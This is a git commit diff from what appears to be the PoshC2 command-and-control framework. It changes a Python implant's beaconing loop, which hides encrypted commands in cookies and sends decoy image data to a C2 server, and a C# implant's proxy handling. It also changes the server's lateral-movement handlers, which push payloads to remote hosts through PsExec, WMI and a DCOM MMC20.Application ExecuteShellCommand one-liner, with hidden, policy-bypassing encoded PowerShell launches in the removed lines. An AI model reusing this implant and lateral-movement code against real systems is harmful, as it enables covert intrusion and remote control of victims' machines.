Revert "Revert "Merge branch 'master' of https://github.com/nettitude/PoshC2_Python""
This reverts commit 9f8b17f6a6
.
chunking
parent
9f8b17f6a6
commit
1ef348e32c
|
@ -3,6 +3,7 @@
|
||||||
from Colours import *
|
from Colours import *
|
||||||
from Config import *
|
from Config import *
|
||||||
from DB import *
|
from DB import *
|
||||||
|
from Help import *
|
||||||
import time, os
|
import time, os
|
||||||
|
|
||||||
rows = 10
|
rows = 10
|
||||||
|
@ -16,8 +17,10 @@ try:
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
print "cls"
|
print "cls"
|
||||||
print chr(27) + "[2J"
|
print chr(27) + "[2J"
|
||||||
print Colours.GREEN,""
|
|
||||||
print logo, Colours.END
|
print (Colours.GREEN + "")
|
||||||
|
print (logopic)
|
||||||
|
print (Colours.END + "")
|
||||||
|
|
||||||
try:
|
try:
|
||||||
taskid = get_seqcount("CompletedTasks") + 1
|
taskid = get_seqcount("CompletedTasks") + 1
|
||||||
|
@ -37,6 +40,7 @@ except Exception as e:
|
||||||
user = "None"
|
user = "None"
|
||||||
implantid = 1
|
implantid = 1
|
||||||
|
|
||||||
|
print newtaskid
|
||||||
while(1):
|
while(1):
|
||||||
try:
|
try:
|
||||||
newtask = get_newtasksbyid(newtaskid)
|
newtask = get_newtasksbyid(newtaskid)
|
||||||
|
|
|
@ -67,6 +67,8 @@ public class Program
|
||||||
proxy.UseDefaultCredentials = false;
|
proxy.UseDefaultCredentials = false;
|
||||||
proxy.BypassProxyOnLocal = false;
|
proxy.BypassProxyOnLocal = false;
|
||||||
x.Proxy = proxy;
|
x.Proxy = proxy;
|
||||||
|
} else {
|
||||||
|
x.UseDefaultCredentials = true;
|
||||||
}
|
}
|
||||||
|
|
||||||
var df = "#REPLACEDF#";
|
var df = "#REPLACEDF#";
|
||||||
|
|
|
@ -242,6 +242,8 @@ while(True):
|
||||||
|
|
||||||
server = "%%s/%%s%%s" %% (serverclean, random.choice(urls), uri)
|
server = "%%s/%%s%%s" %% (serverclean, random.choice(urls), uri)
|
||||||
opener = urllib2.build_opener()
|
opener = urllib2.build_opener()
|
||||||
|
if (len(cmd) > 200):
|
||||||
|
cmd = cmd[0:200]
|
||||||
postcookie = encrypt(key, cmd)
|
postcookie = encrypt(key, cmd)
|
||||||
data = base64.b64decode(random.choice(icoimage))
|
data = base64.b64decode(random.choice(icoimage))
|
||||||
dataimage = data.ljust( 1500, '\\0' )
|
dataimage = data.ljust( 1500, '\\0' )
|
||||||
|
|
|
@ -317,7 +317,7 @@ def startup(printhelp = ""):
|
||||||
for t in comtasks:
|
for t in comtasks:
|
||||||
hostname = get_implantdetails(t[2])
|
hostname = get_implantdetails(t[2])
|
||||||
if hostname[2] not in users:
|
if hostname[2] not in users:
|
||||||
users += "%s \n" % hostname[2]
|
users += "%s @ %s\n" % (hostname[2],hostname[3])
|
||||||
if "Upload-File" in t[3]:
|
if "Upload-File" in t[3]:
|
||||||
uploadedfile = t[3]
|
uploadedfile = t[3]
|
||||||
uploadedfile = uploadedfile.partition("estination ")[2]
|
uploadedfile = uploadedfile.partition("estination ")[2]
|
||||||
|
@ -350,7 +350,7 @@ def startup(printhelp = ""):
|
||||||
else:
|
else:
|
||||||
for task in tasks:
|
for task in tasks:
|
||||||
imname = get_implantdetails(task[1])
|
imname = get_implantdetails(task[1])
|
||||||
alltasks += "(%s) %s\r\n" % ("%s" % (imname[11]),task[2])
|
alltasks += "(%s) %s\r\n" % ("%s\\%s" % (imname[11],imname[2]),task[2])
|
||||||
startup("Queued tasks:\r\n\r\n%s" % alltasks)
|
startup("Queued tasks:\r\n\r\n%s" % alltasks)
|
||||||
|
|
||||||
if (implant_id.lower() == "cleartasks" ) or (implant_id.lower() == "cleartasks "):
|
if (implant_id.lower() == "cleartasks" ) or (implant_id.lower() == "cleartasks "):
|
||||||
|
@ -824,18 +824,14 @@ def runcommand(command, randomuri):
|
||||||
|
|
||||||
elif "invoke-psexecproxypayload" in command.lower():
|
elif "invoke-psexecproxypayload" in command.lower():
|
||||||
check_module_loaded("Invoke-PsExec.ps1", randomuri)
|
check_module_loaded("Invoke-PsExec.ps1", randomuri)
|
||||||
C2 = get_c2server_all()
|
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,"Proxy"))):
|
||||||
if C2[11] == "":
|
with open("%s%spayload.bat" % (PayloadsDirectory,"Proxy"), "r") as p: payload = p.read()
|
||||||
startup("Need to run createproxypayload first")
|
|
||||||
else:
|
|
||||||
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
|
|
||||||
C2[13], C2[11], "", "", C2[19], C2[20],
|
|
||||||
C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory)
|
|
||||||
payload = newPayload.CreateRawBase()
|
|
||||||
params = re.compile("invoke-psexecproxypayload ", re.IGNORECASE)
|
params = re.compile("invoke-psexecproxypayload ", re.IGNORECASE)
|
||||||
params = params.sub("", command)
|
params = params.sub("", command)
|
||||||
cmd = "invoke-psexec %s -command \"powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\"" % (params,payload)
|
cmd = "invoke-psexec %s -command \"%s\"" % (params,payload)
|
||||||
new_task(cmd, randomuri)
|
new_task(cmd, randomuri)
|
||||||
|
else:
|
||||||
|
startup("Need to run createproxypayload first")
|
||||||
|
|
||||||
elif "invoke-psexecdaisypayload" in command.lower():
|
elif "invoke-psexecdaisypayload" in command.lower():
|
||||||
check_module_loaded("Invoke-PsExec.ps1", randomuri)
|
check_module_loaded("Invoke-PsExec.ps1", randomuri)
|
||||||
|
@ -865,18 +861,14 @@ def runcommand(command, randomuri):
|
||||||
|
|
||||||
elif "invoke-wmiproxypayload" in command.lower():
|
elif "invoke-wmiproxypayload" in command.lower():
|
||||||
check_module_loaded("Invoke-WMIExec.ps1", randomuri)
|
check_module_loaded("Invoke-WMIExec.ps1", randomuri)
|
||||||
C2 = get_c2server_all()
|
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,"Proxy"))):
|
||||||
if C2[11] == "":
|
with open("%s%spayload.bat" % (PayloadsDirectory,"Proxy"), "r") as p: payload = p.read()
|
||||||
startup("Need to run createproxypayload first")
|
|
||||||
else:
|
|
||||||
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
|
|
||||||
C2[13], C2[11], "", "", C2[19], C2[20],
|
|
||||||
C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory)
|
|
||||||
payload = newPayload.CreateRawBase()
|
|
||||||
params = re.compile("invoke-wmiproxypayload ", re.IGNORECASE)
|
params = re.compile("invoke-wmiproxypayload ", re.IGNORECASE)
|
||||||
params = params.sub("", command)
|
params = params.sub("", command)
|
||||||
cmd = "invoke-wmiexec %s -command \"powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\"" % (params,payload)
|
cmd = "invoke-wmiexec %s -command \"%s\"" % (params,payload)
|
||||||
new_task(cmd, randomuri)
|
new_task(cmd, randomuri)
|
||||||
|
else:
|
||||||
|
startup("Need to run createproxypayload first")
|
||||||
|
|
||||||
elif "invoke-wmidaisypayload" in command.lower():
|
elif "invoke-wmidaisypayload" in command.lower():
|
||||||
check_module_loaded("Invoke-WMIExec.ps1", randomuri)
|
check_module_loaded("Invoke-WMIExec.ps1", randomuri)
|
||||||
|
@ -905,15 +897,16 @@ def runcommand(command, randomuri):
|
||||||
# dcom lateral movement
|
# dcom lateral movement
|
||||||
|
|
||||||
elif "invoke-dcomproxypayload" in command.lower():
|
elif "invoke-dcomproxypayload" in command.lower():
|
||||||
C2 = get_c2server_all()
|
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,"Proxy"))):
|
||||||
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
|
with open("%s%spayload.bat" % (PayloadsDirectory,"Proxy"), "r") as p: payload = p.read()
|
||||||
C2[13], C2[11], "", "", C2[19], C2[20],
|
params = re.compile("invoke-wmiproxypayload ", re.IGNORECASE)
|
||||||
C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory)
|
params = params.sub("", command)
|
||||||
payload = newPayload.CreateRawBase()
|
p = re.compile(ur'(?<=-target.).*')
|
||||||
p = re.compile(ur'(?<=-target.).*')
|
target = re.search(p, command).group()
|
||||||
target = re.search(p, command).group()
|
pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\Windows\System32\cmd.exe\",$null,\"/c %s\",\"7\")" % (target,payload)
|
||||||
pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\Windows\System32\cmd.exe\",$null,\"/c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\",\"7\")" % (target,payload)
|
new_task(pscommand, randomuri)
|
||||||
new_task(pscommand, randomuri)
|
else:
|
||||||
|
startup("Need to run createproxypayload first")
|
||||||
|
|
||||||
elif "invoke-dcomdaisypayload" in command.lower():
|
elif "invoke-dcomdaisypayload" in command.lower():
|
||||||
daisyname = raw_input("Name required: ")
|
daisyname = raw_input("Name required: ")
|
||||||
|
|
4184
Modules/Inveigh.ps1
4184
Modules/Inveigh.ps1
File diff suppressed because it is too large
Load Diff
Loading…
Reference in New Issue